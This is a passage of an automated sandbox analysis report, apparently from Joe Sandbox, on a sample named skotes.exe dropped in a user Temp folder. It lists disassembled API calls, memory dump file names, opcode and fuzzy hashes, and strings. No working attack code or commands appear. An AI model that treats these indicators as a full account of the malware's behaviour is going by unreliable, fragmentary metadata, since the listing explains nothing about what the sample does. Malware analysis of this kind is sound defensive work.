                                                                                                                                                                                                                                            • Part of subcall function 00B8F40F: Concurrency::critical_section::unlock.LIBCMT ref: 00B8F433
                                                                                                                                                                                                                                          • Concurrency::Context::Block.LIBCONCRT ref: 00B8EFE2
                                                                                                                                                                                                                                            • Part of subcall function 00B90366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00B90368
                                                                                                                                                                                                                                          • Concurrency::critical_section::lock.LIBCONCRT ref: 00B8F002
                                                                                                                                                                                                                                            • Part of subcall function 00B8F891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00B8F8AC
                                                                                                                                                                                                                                            • Part of subcall function 00B8F891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00B8F8B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 811866635-0
                                                                                                                                                                                                                                          • Opcode ID: 7a2ea284a1e5692f87cd95bcff3db10d79bdc0248df482e0ed5673d802768c2a
                                                                                                                                                                                                                                          • Instruction ID: 6cc64aa01b8847b2e0b32282189cc4443a6befebd866f6508aa7fc7fcb02c7ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a2ea284a1e5692f87cd95bcff3db10d79bdc0248df482e0ed5673d802768c2a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E04F34A00506ABCB04FB20C45556DBBA1FF84360B1483A9E4A5172F2CF386E46CB85
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00BADFE8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                          • API String ID: 0-1793179972
                                                                                                                                                                                                                                          • Opcode ID: 6ebe973ee8d6dede6da6493dbc0af98204fa736591179d8ec4584e93d1e235da
                                                                                                                                                                                                                                          • Instruction ID: 058d583eb63f69fd2cdfb67cfebb682e1debb063bedffb6ac5496275b4a4fe85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ebe973ee8d6dede6da6493dbc0af98204fa736591179d8ec4584e93d1e235da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821627160C209AFAB30AF659C82E6B77EDEF12364B104594F938D7152EBB1ED008761
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00BA1764
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA17AF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                          • Opcode ID: e209f6788bc4462f7bcd1319521147347fef7bd2f4f082785d04203150ae5d9d
                                                                                                                                                                                                                                          • Instruction ID: 5af826b6f37a090f21e3d65d98e3b5aeb4fea3802898edf3cdc9800211ada9cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e209f6788bc4462f7bcd1319521147347fef7bd2f4f082785d04203150ae5d9d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711E436A042149BCB55BF6CC48596D77E5EF86360F0448E9E812AB352DB30DD01CBD0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00B9B94E
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B9B961
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
